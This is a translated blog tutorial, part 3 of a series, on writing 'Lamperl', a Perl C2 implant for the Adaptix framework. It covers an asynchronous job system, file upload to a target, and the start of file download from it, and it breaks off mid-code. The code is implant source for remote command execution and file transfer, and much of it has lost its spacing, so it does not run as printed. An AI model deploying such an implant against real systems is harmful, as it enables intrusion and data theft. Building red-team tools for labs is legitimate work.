Lamperl第3篇:文件上传、下载与Job控制系统

admin 2026-01-04 01:53:54 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文详细阐述LamperlC2框架异步Job系统的实现,通过Perl的make_async包装器结合fork与管道技术,管理后台长时间任务。实现了Job的列表查看、终止及输出获取功能,并完成了基于Base64编码的文件上传下载模块。该设计有效解决了阻塞问题,提升了C2框架的操作效率与稳定性。 综合评分: 88 文章分类: 红队,安全开发,安全工具


cover_image

Lamperl 第 3 篇:文件上传、下载与 Job 控制系统

Polar

securitainment

2026年1月1日 12:50 中国香港

继续开发 Lamperl。加入 upload、download 与 job 控制。

这是 Lamperl 系列的第 3 篇。此前我们搭建了基础 agent 与 listener,随后加入了 sleep/terminate 支持,并探索了如何在 agent 的 context menu 中添加条目。

本篇将为文件 upload 与 download 增加支持,并实现一套较为完整的 job 控制系统。由于 upload 与 download 都会借助 job 系统异步执行,job 系统会占据本篇的大部分篇幅。

最初写作时我打算从 upload/download 开始,但既然这两项功能都依赖 job 系统,更合理的顺序是先把 job 系统搭好。你会看到,这样调整并不会显著改变最终实现。

理解 Jobs 与 Tasks 的区别

在进入实现之前,先澄清在 Adaptix 语境下 job 与 task 的区别:

Tasks(TYPE_TASK = 1,任务):

  • 立即执行并完成
  • 在单次响应中返回结果
  • 示例:pwdcdcatls
  • 任务结果会被立即处理并展示给操作员

Jobs(TYPE_JOB = 3,作业):

  • 后台异步执行的操作

  • 可能需要较长时间才能完成(甚至可能永远不结束)

  • 会在执行过程中持续上报多次输出

  • 示例:rundownloadupload、扫描、监控工具

  • job 可能会上报不同状态:

  • JOB_STATE_RUNNING

  • job 仍在执行,这是当前输出

  • JOB_STATE_FINISHED

  • job 已成功完成

  • JOB_STATE_KILLED

  • job 被终止

在 Vulnlab 或 HackTheBox 的靶机上横向推进时,我不希望长时间运行的命令阻塞 beacon loop;agent 必须按固定节奏持续 check-in,才能在已有 job 后台执行的同时继续接收新的 job。

异步包装器模式(Async Wrapper Pattern)

job 系统的核心是一类高阶函数:它能把任意同步命令转换为异步 job。这个模式很实用:既能避免重复代码,也能让所有异步操作拥有一致的行为。

make_async 函数

# Async wrapper - converts any command function into an async job
# Usage: my $async_cmd = make_async(\&cmd_download, 'download');
#        my $result = $async_cmd->($task);
submake_async {
my ($cmd_func, $command_name) = @_;

returnsub {
my ($task) = @_;
my$task_id = $task->{task_id};

        # Create a pipefor output capture
pipe(my$read_fh, my$write_fh) orreturn {
command=>$command_name,
error=>"Failed to create pipe: $!",
        };

my$pid = fork();

if (!defined$pid) {
close($read_fh);
close($write_fh);
return {
command=>$command_name,
error=>"Failed to fork: $!",
            };
        }

if ($pid == 0) {
            # Child process
close($read_fh);

            # Redirect STDOUTandSTDERR to pipe
open(STDOUT, '>&', $write_fh) orexit(126);
open(STDERR, '>&', $write_fh) orexit(126);
close($write_fh);

            # Execute the command function andprint result as JSON
eval {
my$result = $cmd_func->($task);
print$json->encode($result);
            };

if ($@) {
printSTDERR"Error: $@\n";
exit(125);
            }

exit(0);
        }

        # Parent process
close($write_fh);

        # Set non-blocking on read handle
my$flags = fcntl($read_fh, F_GETFL, 0);
warn"Can't get flags: $!"unlessdefined$flags;
fcntl($read_fh, F_SETFL, $flags | O_NONBLOCK) orwarn"Can't set non-blocking: $!";

        # Store job info with output file handle
        # Extract executable and args for display using dispatch table
my ($executable, $args_str) = ('', '');
if (my$display_fn = $job_display{$command_name}) {
            ($executable, $args_str) = $display_fn->($task);
        }

$jobs{$task_id} = {
pid=>$pid,
command=>$command_name,
args=>$task,
executable=>$executable,
args_str=>$args_str,
output_fh=>$read_fh,
output=>'',
status=>'running',
start_time=>time(),
exit_code=>undef,
        };

return {
command=>$command_name,
job_id=>$task_id,
pid=>$pid,
async=> 1,
            %{$task},  # Include original task parameters
        };
    };
}

这个 wrapper 负责一整套进程管理:

  1. Pipe 创建:创建单向 pipe,用于捕获子进程输出
  2. Fork:派生子进程执行命令
  3. I/O 重定向:在子进程中把 STDOUT 与 STDERR 重定向到 pipe 的写端
  4. 命令执行:运行实际命令函数,并将其结果编码为 JSON
  5. 非阻塞 I/O:在父进程中把读端设置为非阻塞
  6. Job 注册:将完整的 job 元数据写入 %jobshash
  7. 立即返回:把控制权交还给 beacon loop,同时返回 job 元数据

关键点在于 make_async返回的是一个 closure(闭包):它会生成一个包裹原始命令的新函数。因此,只需一行代码就能为任意命令生成异步版本:

my$cmd_run = make_async(\&cmd_run_sync, 'run');
my$cmd_download = make_async(\&cmd_download_sync, 'download');
my$cmd_upload = make_async(\&cmd_upload_sync, 'upload');

Job 展示元数据

为了让 jobs list输出更整洁,我们实现了一个 dispatch table,用于从不同 job 类型中提取更适合展示的信息:

# Dispatch table for job display info
my%job_display = (
run=>sub { my$args = shift; return ($args->{executable} || '', $args->{args} || ''); },
download=>sub { my$args = shift; return ('download', $args->{path} || ''); },
upload=>sub { my$args = shift; return ('upload', $args->{path} || ''); },
);

这种写法能把展示逻辑集中管理,并且易于扩展:当新增异步命令时,只需要在这里补一条映射即可。

Job 状态管理

job 以 Adaptix 的 task_id为 key,统一存放在一个 hash 中进行跟踪:

my%jobs = ();  # task_id=> { pid, command, args, output, output_fh, status, start_time, reported }

每个 job 条目包含:

  • pid

    :fork 出来的子进程 PID

  • command

    :命令名

  • args

    :完整 task 对象(便于引用)

  • executable

    :用于展示的可执行项名称(通过 job_display 提取)

  • args_str

    :用于展示的参数字符串

  • output_fh

    :用于读取子进程输出的非阻塞 file handle

  • output

    :累积输出缓冲区

  • status

    :当前状态(running、finished、error、killed)

  • start_time

    :job 创建时的 Unix 时间戳

  • exit_code

    :进程退出码

  • reported

    :布尔标记,表示是否已向 C2 上报完成

检查 Job 状态

check_jobs会在每次 beacon 之前被调用,用于更新 job 状态:

# Check job statuses
subcheck_jobs {
foreachmy$job_id (keys%jobs) {
my$job = $jobs{$job_id};

nextif$job->{status} ne'running';

        # Read available output from pipe (non-blocking)
if ($job->{output_fh}) {
my$buffer;
while (sysread($job->{output_fh}, $buffer, 4096)) {
$job->{output} .= $buffer;
            }
        }

        # Check if process has finished (non-blocking)
my$result = waitpid($job->{pid}, WNOHANG);

if ($result > 0) {
            # Process has finished - read any remaining output
if (my$fh = delete$job->{output_fh}) {
my$buffer;
$job->{output} .= $bufferwhilesysread($fh, $buffer, 4096);
close($fh);
            }

$job->{exit_code} = $? >> 8;
$job->{status} = 'finished';
        } elsif ($result == -1) {
            # Process no longer exists
close(delete$job->{output_fh}) if$job->{output_fh};
$job->{status} = 'error';
        }
        # result == 0 means still running
    }
}

该函数会:

  • 只遍历 status为 ‘running’ 的 job
  • 从输出 pipe 进行非阻塞读取(即使没有新数据也不会卡住)
  • 在进程结束时读取并清空剩余输出
  • 通过位移($? >> 8)提取 exit code
  • 处理孤儿进程(result == -1)

自动完成上报

已完成的 job 会被自动包含在下一次 beacon 中上报:

# Get completed jobs that haven't been reported yet
subget_completed_jobs {
my@completed;

foreachmy$job_id (sortkeys%jobs) {
my$job = $jobs{$job_id};

        # Skip ifnot finished, killed, or already reported
nextif$job->{status} =~ /^(running|killed)$/;
nextif$job->{reported};

        # Mark as reported
$job->{reported} = 1;

        # Try to parse output as JSON first (for download/upload commands)
my$result = eval { $json->decode($job->{output} || '{}') };

        # If JSON parsing failed, treat as raw output (for run commands)
unless ($result && ref($result) eq'HASH' && $result->{command}) {
$result = {
command=>$job->{command},
executable=>$job->{executable},
args=>$job->{args_str},
output=> process_job_output($job->{output} || '', 0),
            };
        }

        # Always add exit code
$result->{exit_code} = $job->{exit_code} ifdefined$job->{exit_code};

        # Report with original task_id so the system can update the task
push@completed, {
task_id=>$job_id,
output=>$json->encode($result),
        };
    }

    # Clean up old jobs after reporting
    cleanup_jobs();

return@completed;
}

这里需要兼容两种输出格式:

  • 结构化命令(download/upload):子进程输出 JSON,我们解析后转发
  • 原始命令(run):子进程输出纯文本,我们再包一层统一结构

上报完成时使用原始 task_id,这样 Adaptix 才能将结果与启动该 job 的 task 对应起来。

Job 清理

已完成和已终止的 job 会被自动清理:

# Clean up jobs that have been reported
subcleanup_jobs {
my@to_delete;

foreachmy$job_id (keys%jobs) {
my$job = $jobs{$job_id};

        # Remove jobs that are finished and have been reported, or were killed
if (($job->{status} eq'finished' && $job->{reported}) || $job->{status} eq'killed') {
push@to_delete, $job_id;
        }
    }

delete@jobs{@to_delete};
}

这可以防止内存无界增长:把已被 C2 确认的 job,或被手动终止的 job,从内存中移除。

你可能也会想:“check_jobs不是会‘reap’job 吗(大概就是回收子进程的意思)?那为什么还需要两个函数?”

目前这两个函数都不可或缺:check_jobs()负责 OS 层的进程管理,cleanup_jobs()负责 Perl 数据结构的维护。整体流程如下:

  • job 启动 -> 写入 %jobs,状态为 running

  • check_jobs()

    -> 回收子进程,将状态更新为 finished,并记录 exit code

  • get_completed_jobs()

    -> 向 C2 上报已完成的 job,并将 reported => 1

  • cleanup_jobs()

    -> 从 %jobshash 中删除该条目

Job 控制命令

基础设施就位后,我们就可以实现面向操作员的 job 控制命令。

首先是一些工具函数,用于参数校验与输出处理:

# Helper function for job validation
subvalidate_job {
my ($job_id, $command_name) = @_;

unless (defined$job_id && exists$jobs{$job_id}) {
return (undef, { command=>$command_name, error=>"Job not found: $job_id" });
    }

return ($jobs{$job_id}, undef);
}

# Helper function to process job output
subprocess_job_output {
my ($output, $tail_lines) = @_;

return''unless$output;

    # Decode from UTF-8 bytes to character string
eval { $output = decode('UTF-8', $output, Encode::FB_QUIET); };

    # Strip ANSI escape sequences
$output =~ s/\x1b\[[0-9;]*[a-zA-Z]//g;

    # Apply tail if requested
if ($tail_lines > 0) {
my@lines = split(/\n/, $output);
my$total_lines = scalar(@lines);

if ($total_lines > $tail_lines) {
my$skipped = $total_lines - $tail_lines;
@lines = @lines[-$tail_lines .. -1];
$output = "... [$skipped lines omitted]\n" . join("\n", @lines);
        } else {
$output = join("\n", @lines);
        }
    }

    # Limit output size
if (length($output) > MAX_OUTPUT_SIZE) {
$output = substr($output, 0, MAX_OUTPUT_SIZE) . "\n... [output truncated at 1MB]";
    }

    # Encode back to UTF-8 bytes for JSON
return encode('UTF-8', $output, Encode::FB_QUIET);
}

process_job_output是必需的,因为并非所有字符都能在 Adaptix console 中正确显示:

  • UTF-8 解码
  • 去除 ANSI 转义序列
  • 支持 tail(如有需要只返回最后 N 行)
  • 为 JSON 传输重新编码为 UTF-8

列出 Jobs

subcmd_job_list {
my ($task) = @_;

    # Update job statuses before listing
    check_jobs();

my@job_list = map {
my$job = $jobs{$_};
        {
job_id=>$_,
pid=>$job->{pid},
executable=>$job->{executable} || '',
args=>$job->{args_str} || '',
status=>$job->{status},
start_time=>$job->{start_time},
exit_code=>$job->{exit_code},
        }
    } sortkeys%jobs;

return {
command=>'job_list',
jobs=> \@job_list,
    };
}

该命令会返回一组结构化的 job 元数据。注意我们会先调用 check_jobs(),确保状态是最新的。

终止 Job

subcmd_job_kill {
my ($task) = @_;
my$job_id = $task->{job_id};

my ($job, $error) = validate_job($job_id, 'job_kill');
return$errorif$error;

if ($job->{status} ne'running') {
return {
command=>'job_kill',
error=>"Job $job_id is not running (status: $job->{status})",
        };
    }

    # Kill the process and update status
my$killed = kill('TERM', $job->{pid});

$job->{status} = 'killed'if$killed;

return$killed
        ? { command=>'job_kill', job_id=>$job_id, pid=>$job->{pid}, killed=> 1 }
        : { command=>'job_kill', error=>"Failed to kill job $job_id (PID: $job->{pid})" };
}

向进程发送 SIGTERM。我们会用单独的状态标记被终止的 job:这样它们会被清理,但不会被当作“完成”去自动上报。

获取 Job 输出

subcmd_job_get {
my ($task) = @_;
my$job_id = $task->{job_id};
my$tail_lines = $task->{tail} || 0;

my ($job, $error) = validate_job($job_id, 'job_get');
return$errorif$error;

    # Update job status
    check_jobs();

    # Extract executable and args from stored job fields
my$executable = $job->{executable} || '';
my$args_str = $job->{args_str} || '';

    # Process output
my$output = process_job_output($job->{output} || '', $tail_lines);

return {
command=>'job_get',
job_id=>$job_id,
pid=>$job->{pid},
executable=>$executable,
args=>$args_str,
status=>$job->{status},
start_time=>$job->{start_time},
exit_code=>$job->{exit_code},
output=>$output,
tail=>$tail_lines,
    };
}

该命令允许操作员在不等待 job 完成的情况下查看运行中的输出。tail参数尤其适合监控持续输出的操作,例如 pspy。

最后,把这些新命令加入 dispatch table:

my%COMMANDS = (
pwd=> \&cmd_pwd,
cd=> \&cmd_cd,
run=>$cmd_run,
download=>$cmd_download,
upload=>$cmd_upload,
sleep=> \&cmd_sleep,
terminate=> \&cmd_terminate,
job_list=> \&cmd_job_list,
job_kill=> \&cmd_job_kill,
job_get=> \&cmd_job_get,
);

Jobs 的 Adaptix 配置

ax_config.axs (Jobs 配置)

job 命令采用 subcommand 结构,便于组织:

let_cmd_job_get=ax.create_command("get", "Get job output", "jobs get 1a2b3c4d", "Task: get job output");
_cmd_job_get.addArgString("job_id", true, "Job ID to retrieve");
_cmd_job_get.addArgInt("tail", false, "Return only last N lines (0 = all)");

let_cmd_job_list=ax.create_command("list", "List of jobs", "jobs list", "Task: show jobs");

let_cmd_job_kill=ax.create_command("kill", "Kill a specified job", "jobs kill 1a2b3c4d", "Task: kill job");
_cmd_job_kill.addArgString("job_id", true, "Job ID to kill");

letcmd_job=ax.create_command("jobs", "Long-running tasks manager");
cmd_job.addSubCommands([_cmd_job_get, _cmd_job_list, _cmd_job_kill]);

这样就形成了清晰的命令层级:jobs listjobs get <id> [<tail>]jobs kill <id>

别忘了把它加入命令组:

if(listenerType=="LamperlHTTP") {
letcommands_external=ax.create_commands_group("Lamperl",
&nbsp; &nbsp; &nbsp; &nbsp; [cmd_pwd,&nbsp;cmd_cd,&nbsp;cmd_sleep,&nbsp;cmd_terminate,&nbsp;cmd_run,&nbsp;cmd_download,&nbsp;cmd_upload,&nbsp;cmd_job]);

return&nbsp;{&nbsp;commands_linux:commands_external&nbsp;}
}

pl_agent.go – CreateTask (任务创建)

CreateTask 需要正确路由 subcommand:

case"jobs":
// Handle subcommands
switch&nbsp;subcommand {
case"list":
&nbsp; &nbsp; &nbsp; &nbsp; commandData["command"]&nbsp;="job_list"
case"kill":
&nbsp; &nbsp; &nbsp; &nbsp; commandData["command"]&nbsp;="job_kill"
jobId,&nbsp;ok:=&nbsp;args["job_id"].(string)
if!ok {
err=&nbsp;errors.New("parameter 'job_id' must be set")
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; commandData["job_id"]&nbsp;=&nbsp;jobId
case"get":
&nbsp; &nbsp; &nbsp; &nbsp; commandData["command"]&nbsp;="job_get"
jobId,&nbsp;ok:=&nbsp;args["job_id"].(string)
if!ok {
err=&nbsp;errors.New("parameter 'job_id' must be set")
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; commandData["job_id"]&nbsp;=&nbsp;jobId
iftail,&nbsp;ok:=&nbsp;args["tail"].(float64); ok&nbsp;&&&nbsp;tail&nbsp;>0&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; commandData["tail"]&nbsp;=int(tail)
&nbsp; &nbsp; &nbsp; &nbsp; }
default:
err=&nbsp;fmt.Errorf("unknown jobs subcommand:&nbsp;%s", subcommand)
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; }

pl_agent.go – ProcessTasksResult (任务结果处理)

ProcessTasksResult的一个重要改动:我们改用 task.Message和 task.ClearText,不再使用 TsAgentConsoleOutput。这能更好地与 Adaptix 的 Task Manager 集成:

如你所见,task.Message会显示在 message 字段,查看任务输出时也会显示在顶栏;而 task.ClearText只会写入任务输出视图。两者都会展示给操作员,但存储位置不同。

下面是相关代码:

case"job_list":
iferrMsg:=getString(outputData,&nbsp;"error"); errMsg&nbsp;!=""&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Error:&nbsp;%s", errMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; }&nbsp;else&nbsp;{
jobsData,&nbsp;ok:=&nbsp;outputData["jobs"].([]interface{})
if!ok&nbsp;||len(jobsData)&nbsp;==0&nbsp;{
task.Message="No background jobs"
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
task.Message="Background Jobs"
var&nbsp;jobsOutput&nbsp;string
jobsOutput="Background Jobs:\n"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jobsOutput&nbsp;+=&nbsp;fmt.Sprintf("%-10s%-8s%-12s%s\n",&nbsp;"Job ID",&nbsp;"PID",&nbsp;"Status",&nbsp;"Command")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jobsOutput&nbsp;+=&nbsp;strings.Repeat("-",&nbsp;80)&nbsp;+"\n"
for_,&nbsp;jobInterface:=range&nbsp;jobsData {
job,&nbsp;ok:=&nbsp;jobInterface.(map[string]interface{})
if!ok {
continue
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
jobId:=getString(job,&nbsp;"job_id")
pid:=getInt(job,&nbsp;"pid")
status:=getString(job,&nbsp;"status")
executable:=getString(job,&nbsp;"executable")
args:=getString(job,&nbsp;"args")

// Combine executable and args into command
cmdStr:=&nbsp;executable
if&nbsp;args&nbsp;!=""&nbsp;{
cmdStr=&nbsp;fmt.Sprintf("%s%s", executable, args)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jobsOutput&nbsp;+=&nbsp;fmt.Sprintf("%-10s%-8d%-12s%s\n", jobId, pid, status, cmdStr)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
task.ClearText=&nbsp;jobsOutput
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
case"job_kill":
iferrMsg:=getString(outputData,&nbsp;"error"); errMsg&nbsp;!=""&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Error:&nbsp;%s", errMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; }&nbsp;else&nbsp;{
jobId:=getString(outputData,&nbsp;"job_id")
pid:=getInt(outputData,&nbsp;"pid")
task.Message=&nbsp;fmt.Sprintf("Killed job&nbsp;%s&nbsp;(PID:&nbsp;%d)", jobId, pid)

// Also update the original task that started this job
originalTask:=&nbsp;adaptix.TaskData{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Type: &nbsp; &nbsp; &nbsp; &nbsp;TYPE_TASK,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TaskId: &nbsp; &nbsp; &nbsp;jobId,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AgentId: &nbsp; &nbsp; agentData.Id,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Completed: &nbsp;&nbsp;true,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MessageType: MESSAGE_SUCCESS,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Message: &nbsp; &nbsp; fmt.Sprintf("Job killed (PID:&nbsp;%d)", pid),
&nbsp; &nbsp; &nbsp; &nbsp; }
outTasks=append(outTasks, originalTask)
&nbsp; &nbsp; }

注意:job_kill的 handler 会额外生成一次 task 更新,用于在手动 kill 时,将启动该 job 的原始 task 在 Task Manager 中标记为已完成。

case"job_get":
iferrMsg:=getString(outputData,&nbsp;"error"); errMsg&nbsp;!=""&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Error:&nbsp;%s", errMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; }&nbsp;else&nbsp;{
outputStr:=getString(outputData,&nbsp;"output")
executable:=getString(outputData,&nbsp;"executable")
args:=getString(outputData,&nbsp;"args")
jobId:=getString(outputData,&nbsp;"job_id")
status:=getString(outputData,&nbsp;"status")

// Build command string for header
cmdStr:=&nbsp;executable
if&nbsp;args&nbsp;!=""&nbsp;{
cmdStr=&nbsp;fmt.Sprintf("%s%s", executable, args)
&nbsp; &nbsp; &nbsp; &nbsp; }

if&nbsp;outputStr&nbsp;!=""&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Job&nbsp;%s&nbsp;output:&nbsp;%s", jobId, cmdStr)
task.ClearText=&nbsp;outputStr
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Job&nbsp;%s&nbsp;- Status:&nbsp;%s&nbsp;(no output yet)", jobId, status)
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

至此,我们就拥有了一套可用的 job 系统。

ax_config.axs – Context Menu 集成

为了方便起见,我们还可以把 job 控制加入 Task Manager 的右键菜单:

lettask_get_action=menu.create_action("Get task output",&nbsp;function(tasks_list) {
tasks_list.forEach((task)&nbsp;=>&nbsp;{
if(task.state=="Running") {
ax.execute_command(task.agent_id,&nbsp;"jobs get "+task.task_id);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; });
});
menu.add_tasks(task_get_action, ["Lamperl"])

lettask_stop_action=menu.create_action("Stop task",&nbsp;function(tasks_list) {
tasks_list.forEach((task)&nbsp;=>&nbsp;{
if(task.state=="Running") {
ax.execute_command(task.agent_id,&nbsp;"jobs kill "+task.task_id);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; });
});
menu.add_tasks(task_stop_action, ["Lamperl"])

这样就可以在运行中的 task 上右键查看输出或直接 kill;我认为这比手动敲命令更顺手。实现几乎完全参考了官方 AxScript 文档。

文件上传

相比搭建 job 基础设施,upload 的实现就简单得多。

Perl 实现

先写实际执行上传的同步版本:

subcmd_upload_sync&nbsp;{
my&nbsp;($task) =&nbsp;@_;
my$path&nbsp;=&nbsp;$task->{path};
my$content_b64&nbsp;=&nbsp;$task->{content};

&nbsp; &nbsp; # Validate&nbsp;and&nbsp;decode
unless&nbsp;($path&nbsp;&&&nbsp;$content_b64) {
return&nbsp;{&nbsp;command=>'upload',&nbsp;path=>$path&nbsp;||&nbsp;'',&nbsp;output=>'Missing path or content'&nbsp;};
&nbsp; &nbsp; }
my$content&nbsp;= decode_base64($content_b64);

&nbsp; &nbsp; # Resolve path
my$target_path&nbsp;=&nbsp;$path&nbsp;=~&nbsp;m{^/}&nbsp;?&nbsp;$path&nbsp;:&nbsp;"$current_directory/$path";

&nbsp; &nbsp; # Write file
my$output&nbsp;=&nbsp;do&nbsp;{
if&nbsp;(open(my$fh,&nbsp;'>:raw',&nbsp;$target_path)) {
print$fh$content;
close($fh);
'success';
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
"Failed to write file:&nbsp;$!";
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; };

return&nbsp;{&nbsp;command=>'upload',&nbsp;path=>$path,&nbsp;output=>$output&nbsp;};
}

我们从 server 端获取 base64 编码的数据,解码后把原始内容写入文件。接着把它封装为异步执行:

my$cmd_upload&nbsp;= make_async(\&cmd_upload_sync,&nbsp;'upload');

记得把这个函数加入 dispatch table。

就这些:upload 的核心实现只有这两步。不过这里还有个问题:如果你按当前实现直接使用 upload,会遇到 JSON 解析错误。下一节我们会修复它。

HTTP 分块传输编码(Chunked Transfer Encoding)

由于文件上传使用 HTTP chunked transfer encoding,我们需要更新响应解析器来正确处理这种情况:

# Parse response body
returnundefunless$response;

# Split headers and body
my&nbsp;($headers,&nbsp;$body) =&nbsp;split(/\r?\n\r?\n/,&nbsp;$response, 2);
returnundefunless$body;

# Check if response is chunked
if&nbsp;($headers&nbsp;=~&nbsp;/Transfer-Encoding:\s*chunked/i) {
&nbsp; &nbsp; # Decode chunked encoding
my$decoded&nbsp;=&nbsp;'';
while&nbsp;($body&nbsp;=~&nbsp;s/^([0-9a-fA-F]+)\r?\n//) {
my$chunk_size&nbsp;=&nbsp;hex($1);
lastif$chunk_size&nbsp;== 0;
$decoded&nbsp;.=&nbsp;substr($body, 0,&nbsp;$chunk_size,&nbsp;'');
$body&nbsp;=~&nbsp;s/^\r?\n//; &nbsp;# Remove trailing CRLF
&nbsp; &nbsp; }
$body&nbsp;=&nbsp;$decoded;
}

printSTDERR"[DEBUG] Body after parsing:&nbsp;$body\n";

my$data&nbsp;=&nbsp;eval&nbsp;{&nbsp;$json->decode($body) };

这个 decoder 的逻辑是:

  • 读取 chunk size(十六进制)
  • 从 body 中取出对应字节数
  • 去掉末尾的 CRLF
  • 反复执行,直到遇到长度为 0 的 chunk

至此,Perl 侧的 upload 功能就完成了,接下来进入框架侧配置。

Adaptix 配置 – Upload

ax_config.axs (Upload 配置)

letcmd_upload=ax.create_command("upload",&nbsp;"Upload files",&nbsp;"upload /local/path/file.txt /remote/path/file.txt",&nbsp;"Task: upload");
cmd_upload.addArgFile("local_file",&nbsp;true);
cmd_upload.addArgString("remote_path",&nbsp;true);

我们使用 addArgFile,让 API 负责解析文件,而不是手工处理。

pl_agent.go – CreateTask (任务创建)

在这个函数里,我们先校验路径,然后把文件编码为 base64 再发送出去。

case"upload":
taskData.Type=&nbsp;TYPE_JOB

remotePath,&nbsp;ok:=&nbsp;args["remote_path"].(string)
if!ok {
err=&nbsp;errors.New("parameter 'remote_path' must be set")
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; }

// Get file content from file_id
var&nbsp;fileContent []byte
iffileId,&nbsp;ok:=&nbsp;args["file_id"].(string); ok&nbsp;&&&nbsp;fileId&nbsp;!=""&nbsp;{
fileContent,&nbsp;err=&nbsp;ts.TsUploadGetFileContent(fileId)
if&nbsp;err&nbsp;!=nil&nbsp;{
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }&nbsp;elseiflocalFile,&nbsp;ok:=&nbsp;args["local_file"].(string); ok&nbsp;&&&nbsp;localFile&nbsp;!=""&nbsp;{
// Fallback to base64 encoded content
fileContent,&nbsp;err=&nbsp;base64.StdEncoding.DecodeString(localFile)
if&nbsp;err&nbsp;!=nil&nbsp;{
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }&nbsp;else&nbsp;{
err=&nbsp;errors.New("parameter 'file_id' or 'local_file' must be set")
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; }

// Base64 encode for JSON transport
base64Content:=&nbsp;base64.StdEncoding.EncodeToString(fileContent)
&nbsp; &nbsp; commandData["path"]&nbsp;=&nbsp;remotePath
&nbsp; &nbsp; commandData["content"]&nbsp;=&nbsp;base64Content

这里支持两种输入方式:

  • file_id

    :通过 Adaptix 上传的文件

  • local_file

    :直接提供的 base64 编码内容

pl_agent.go – ProcessTasksResult (任务结果处理)

case"upload":
task.Type=&nbsp;TYPE_JOB

asyncVal:=getInt(outputData,&nbsp;"async")
if&nbsp;asyncVal&nbsp;!=0&nbsp;{
// Job start confirmation
jobId:=getString(outputData,&nbsp;"job_id")
pid:=getInt(outputData,&nbsp;"pid")
path:=getString(outputData,&nbsp;"path")
task.Completed=false
task.Message=&nbsp;fmt.Sprintf("Uploading to:&nbsp;%s", path)
task.ClearText=&nbsp;fmt.Sprintf("Job&nbsp;%s&nbsp;(PID:&nbsp;%d) started in background", jobId, pid)
&nbsp; &nbsp; }&nbsp;elseiferrMsg:=getString(outputData,&nbsp;"error"); errMsg&nbsp;!=""&nbsp;{
// Error before job started
task.Message=&nbsp;fmt.Sprintf("Upload error:&nbsp;%s", errMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; }&nbsp;else&nbsp;{
// Completion report from finished job
path:=getString(outputData,&nbsp;"path")
outputStr:=getString(outputData,&nbsp;"output")
success:=&nbsp;outputStr&nbsp;=="success"

if&nbsp;success {
task.Message=&nbsp;fmt.Sprintf("Upload completed:&nbsp;%s", path)
task.MessageType=&nbsp;MESSAGE_SUCCESS
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
errorMsg:=&nbsp;outputStr
if&nbsp;errorMsg&nbsp;==""&nbsp;{
errorMsg="Unknown error"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
task.Message=&nbsp;fmt.Sprintf("Failed to upload to&nbsp;%s:&nbsp;%s", path, errorMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

三种状态处理逻辑如下:

  1. async != 0

    :job 已启动,展示确认信息

  2. 存在 error:job 在启动前失败

  3. 其他情况:来自自动上报系统的完成回报

文件下载

download 复用同样的模式。

Perl 实现

subcmd_download_sync&nbsp;{
my&nbsp;($task) =&nbsp;@_;
my$path&nbsp;=&nbsp;$task->{path};
my$task_id&nbsp;=&nbsp;$task->{task_id};

&nbsp; &nbsp; # Helper&nbsp;for&nbsp;empty response
my$empty_response&nbsp;=&nbsp;sub&nbsp;{
return&nbsp;{&nbsp;command=>'download',&nbsp;path=>$path&nbsp;||&nbsp;'',&nbsp;file_id=>'',&nbsp;size=>&nbsp;0,&nbsp;content=>''&nbsp;};
&nbsp; &nbsp; };

&nbsp; &nbsp; # Validate path
return$empty_response->()&nbsp;unless&nbsp;($path&nbsp;&&&nbsp;-e$path&nbsp;&& !-d$path);

&nbsp; &nbsp; # Read&nbsp;and&nbsp;encode file
open(my$fh,&nbsp;'<:raw',&nbsp;$path)&nbsp;orreturn$empty_response->();
my$content&nbsp;=&nbsp;do&nbsp;{&nbsp;local$/; <$fh> };
close($fh);

return&nbsp;{
command=>'download',
path=>$path,
